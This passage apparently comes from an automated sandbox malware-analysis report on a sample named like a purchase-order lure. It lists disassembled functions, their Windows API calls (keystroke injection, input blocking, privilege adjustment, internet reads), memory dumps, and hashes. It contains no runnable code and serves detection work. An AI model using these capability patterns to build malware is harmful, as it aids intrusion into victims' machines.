                        • _wcscmp.LIBCMT ref: 002FF3BF
                        • FindNextFileW.KERNEL32(00000000,?), ref: 002FF3D0
                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 002FF3FE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Find$File_wcscmp$CloseFirstNext
                        • String ID:
                        • API String ID: 2387731787-0
                        • Opcode ID: 550ccef54929479d9aaa0582da955e2659dde240644b5f0dc7f10717a6192500
                        • Instruction ID: 1271021c02b13fb7d370e02bbc1f96ede79d1c4c3d9517217176ff38d73dd460
                        • Opcode Fuzzy Hash: 550ccef54929479d9aaa0582da955e2659dde240644b5f0dc7f10717a6192500
                        • Instruction Fuzzy Hash: ED41AF356143029FC718DF28C490EAAB3E8FF49324F10426DEA59CB3A1DB71A965CF91
                        Function 003120F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,003120EC,?,003122E0), ref: 00312104
                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00312116
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetProcessId$kernel32.dll
                        • API String ID: 2574300362-399901964
                        • Opcode ID: 3660c4dd2913ead43b4126731169a289bd2dac911907de401c0be8ceaee0fecf
                        • Instruction ID: ee561f0d13429f6abeed401d342585d544c7022fef0d66f7ca62e710ef0f11da
                        • Opcode Fuzzy Hash: 3660c4dd2913ead43b4126731169a289bd2dac911907de401c0be8ceaee0fecf
                        • Instruction Fuzzy Hash: 1BD0A734D007129FD7239F71F84D68336D8AB18300F018439E68BD1158D770C4D0CA50
                        Function 002F4342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 002F439C
                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 002F43B8
                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 002F4425
                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 002F4483
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: d0f9cda9717cce25638c1d50bfc218f3df37f135febaa54fe969b7059a9c5714
                        • Instruction ID: 134b4c863589fbca70f86f3f96c82a5bf4d22738dde2ece437a09b172c6b29ae
                        • Opcode Fuzzy Hash: d0f9cda9717cce25638c1d50bfc218f3df37f135febaa54fe969b7059a9c5714
                        • Instruction Fuzzy Hash: 86411B7092024D9AEF21AF64D8447FFFBB56B45391F04017AF681A22C1C7F489659B71
                        Function 002F220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 002F221E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: lstrlen
                        • String ID: ($|
                        • API String ID: 1659193697-1631851259
                        • Opcode ID: cd96d70e77ccaf5e0eb6fbfce65d90070252cbb69b07800bee3363f97222dd67
                        • Instruction ID: 382fc8c5882132c89b073199622f98dbd4721cf80c4b7d45005042dbf91229c5
                        • Opcode Fuzzy Hash: cd96d70e77ccaf5e0eb6fbfce65d90070252cbb69b07800bee3363f97222dd67
                        • Instruction Fuzzy Hash: 90321275A10609DFC728CF69C480A6AF7F0FF48360B11C46EE99ADB3A1E770A951CB44
                        Function 002CAD5C Relevance: 4.9, APIs: 3, Instructions: 378COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 002CAF8E
                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 002CAE5E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: LongProcWindow
                        • String ID:
                        • API String ID: 3265722593-0
                        • Opcode ID: 4b5595c57d5f0b8b66f3b9f271b6d0153292cab6022188f02784a35230424a01
                        • Instruction ID: 54b0041f6f8e286339653c6cac7635079db7c7fd284e0c3c6b44ff1c93e4383b
                        • Opcode Fuzzy Hash: 4b5595c57d5f0b8b66f3b9f271b6d0153292cab6022188f02784a35230424a01
                        • Instruction Fuzzy Hash: 05A1497413421DBEDB3AAE295C88FBF396CEB46348B11473DF502D6192CA658C6193B3
                        Function 0030550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00304A1E,00000000), ref: 003055FD
                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00305629
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Internet$AvailableDataFileQueryRead
                        • String ID:
                        • API String ID: 599397726-0
                        • Opcode ID: 2cb560cd96ff8217d4bb898ecb8ba708febaa1dd85788583d897a1d21766ae04
                        • Instruction ID: f3eda404d43ce45f21665ca811812ed19b36a534eaebb6d394c5aa224c990bf3
                        • Opcode Fuzzy Hash: 2cb560cd96ff8217d4bb898ecb8ba708febaa1dd85788583d897a1d21766ae04
                        • Instruction Fuzzy Hash: 4D411571601A09FFEB129E94DCA5FBFB7BDEB41318F10401AF606A61C0DA719E409F64
                        Function 002FEA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 002FEA95
                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 002FEAEF
                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 002FEB3C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorMode$DiskFreeSpace
                        • String ID:
                        • API String ID: 1682464887-0
                        • Opcode ID: 62349af2dc17c7d9f63a7c9e94ab62a71af9bc37db0b8b6b910ac4893833be74
                        • Instruction ID: 06e58a85cafb008c0575657243bda0e0a3644bf8591c72da10fb8b5b399cf7fb
                        • Opcode Fuzzy Hash: 62349af2dc17c7d9f63a7c9e94ab62a71af9bc37db0b8b6b910ac4893833be74
                        • Instruction Fuzzy Hash: 1F214C35A10218EFCB00DFA5D895AEEFBB8FF49314F1480A9E906AB251DB319915CF50
                        Function 002F702F Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002F704C
                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 002F708D
                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002F7098
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CloseControlCreateDeviceFileHandle
                        • String ID:
                        • API String ID: 33631002-0
                        • Opcode ID: 13b7ea212ed7c22eb0b731d56d41e38975590439eed67ab7bec9dfb860125f82
                        • Instruction ID: 800957b1b713bc5d1776ff9c15bcabcfd2eca69bd9cb450b0adc0d678f24fbc6
                        • Opcode Fuzzy Hash: 13b7ea212ed7c22eb0b731d56d41e38975590439eed67ab7bec9dfb860125f82
                        • Instruction Fuzzy Hash: 9C115271E10228BFEB118F94DC45BBFBBBCEB45B50F104165F900E7290D7705A018BA1
                        Function 002EBE31 Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                        Download Yara Rule
                        APIs
                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002EBE5A
                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002EBE71
                        • FreeSid.ADVAPI32(?), ref: 002EBE81
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AllocateCheckFreeInitializeMembershipToken
                        • String ID:
                        • API String ID: 3429775523-0
                        • Opcode ID: bf1a00078dfd4b12329b3e9ce82ab0b153bee0f9e7006812b7da2683e80a12a5
                        • Instruction ID: afe4f0fb07b8f96bab52400fe6f3b9c86c948b14062ca6f9e630b2ac6e064776
                        • Opcode Fuzzy Hash: bf1a00078dfd4b12329b3e9ce82ab0b153bee0f9e7006812b7da2683e80a12a5
                        • Instruction Fuzzy Hash: 84F01776A50209BFDF05DFF4DD89AEEBBBCEF08701F504869A602E2191E3709A448B10
                        Function 002BDCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f133abc40e7a080c9a432f8caddd17d5db303bc10e1c7036f6151632f4c124ac
                        • Instruction ID: 35aa2eca91d857f04f1ba080a9e96ab4ddf9d0b1bda39e07fbc9624ad34c4f90
                        • Opcode Fuzzy Hash: f133abc40e7a080c9a432f8caddd17d5db303bc10e1c7036f6151632f4c124ac
                        • Instruction Fuzzy Hash: B722AD719252168FDB24DF58C490BFAB7F0FF14340F248169E85AAB351E770ACA5CB90
                        Function 002FFD47 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 002FFD71
                        • FindClose.KERNEL32(00000000), ref: 002FFDA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: 4250d609755a96ab85c922f679c352368666b6f2d089f5fdd9494580fc5b751d
                        • Instruction ID: 13972f8ea636305d78f807cbe69d9458d8213eee2ded7641a513d3f2ea61e5f1
                        • Opcode Fuzzy Hash: 4250d609755a96ab85c922f679c352368666b6f2d089f5fdd9494580fc5b751d
                        • Instruction Fuzzy Hash: 0411A1316202059FD710EF28D845A2AF7E8FF84324F00862EF9A99B291DB30EC158F81
                        Function 002FD712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0030C2E2,?,?,00000000,?), ref: 002FD73F
                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0030C2E2,?,?,00000000,?), ref: 002FD751
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorFormatLastMessage
                        • String ID:
                        • API String ID: 3479602957-0
                        • Opcode ID: 5a86ebca95673300da84ed1847c9cf8577c882fc6b2d0b6816ebf24aaa34d6cc
                        • Instruction ID: 38af82f8283cfbbc698b652cd6aadf870f0116c5b2c57c01b142e6317c32e51f
                        • Opcode Fuzzy Hash: 5a86ebca95673300da84ed1847c9cf8577c882fc6b2d0b6816ebf24aaa34d6cc
                        • Instruction Fuzzy Hash: 29F0823551032DABDB11AFA4DC89FEAB76DAF493A1F008525BA05D6181D6709950CBA0
                        Function 002F4B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 002F4B89
                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 002F4B9C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: InputSendkeybd_event
                        • String ID:
                        • API String ID: 3536248340-0
                        • Opcode ID: 005ab0b1f9c007b8dc1fb1aa26832c6f1453c24a2be3a87ce6423c7a083df558
                        • Instruction ID: 804d5f4d899c0a2e9ba4a5d42843a1baae6f8e18039c8fd0580f753597c26673
                        • Opcode Fuzzy Hash: 005ab0b1f9c007b8dc1fb1aa26832c6f1453c24a2be3a87ce6423c7a083df558
                        • Instruction Fuzzy Hash: 6CF0907081034EAFEB069FA0C805BBEBBB4EF00309F00841AFD51A6192D3B9C615DF90
                        Function 002EB8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002EB9EC), ref: 002EB8C5
                        • CloseHandle.KERNEL32(?,?,002EB9EC), ref: 002EB8D7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AdjustCloseHandlePrivilegesToken
                        • String ID:
                        • API String ID: 81990902-0
                        • Opcode ID: d6aa3eaded5203427e06460489cd03323a7038f26259b07fe005f0d101510780
                        • Instruction ID: 2e3112df81a39d313d1ec5d3d3168c5120bff183afde5235c347529c3576c815
                        • Opcode Fuzzy Hash: d6aa3eaded5203427e06460489cd03323a7038f26259b07fe005f0d101510780
                        • Instruction Fuzzy Hash: D3E0B672014611EFE7262B61FC89E777BEDFF04311F10892AF49A81570DB62ACA0DB10
                        Function 002D8E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,002B125D,002D7A43,002B0F35,?,?,00000001), ref: 002D8E41
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 002D8E4A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 20987e4fa88172dfc6a44aaffe07e8aa93685cb4c284e4638ff1b52e81667ff3
                        • Instruction ID: 3989493f1ab456dee0119941481448322db98dfa4505d02c8f92feac9ebc497f
                        • Opcode Fuzzy Hash: 20987e4fa88172dfc6a44aaffe07e8aa93685cb4c284e4638ff1b52e81667ff3
                        • Instruction Fuzzy Hash: C9B09275044A08ABEA022BA1FC49B883F6CEB08B72F004010F61D450608B6358508E92
                        Function 002C3680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharUpper
                        • String ID:
                        • API String ID: 3964851224-0
                        • Opcode ID: e3fca8206e172f11f838437c5eae00301c3b2239f278026fbcdd358180118424
                        • Instruction ID: 5105e6d5db86d1423beeb398fc1d8440a6cafb1a0d99909936df3e4b66022a36
                        • Opcode Fuzzy Hash: e3fca8206e172f11f838437c5eae00301c3b2239f278026fbcdd358180118424
                        • Instruction Fuzzy Hash: 319276706183418FD724DF18C490F6ABBE1BF88304F148A5DE98A8B3A2D771ED55CB92
                        Function 002E113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9c1bca32d2181c64274b7184a594417270f1c959ac497676d77fb794014b778d
                        • Instruction ID: a59f6c26dee2afe248ccefc8426e9966081a5efa2191fd7a6597a347812afc61
                        • Opcode Fuzzy Hash: 9c1bca32d2181c64274b7184a594417270f1c959ac497676d77fb794014b778d
                        • Instruction Fuzzy Hash: DFB1E224D2AF504ED72396398831336B65CAFBB3C5F91D71BFC2A78D62EB2195934180
                        Function 0030703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • BlockInput.USER32(00000001), ref: 00307057
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BlockInput
                        • String ID:
                        • API String ID: 3456056419-0
                        • Opcode ID: 5cd488e91dcfebe5a6ac77a56dbdd160e91b4aa5f7634c0dab7b2edbb712252f
                        • Instruction ID: 3ebfa0a506240496dbec27a55f74cfa55621558cb7088bb52be6c11a8e2586f2
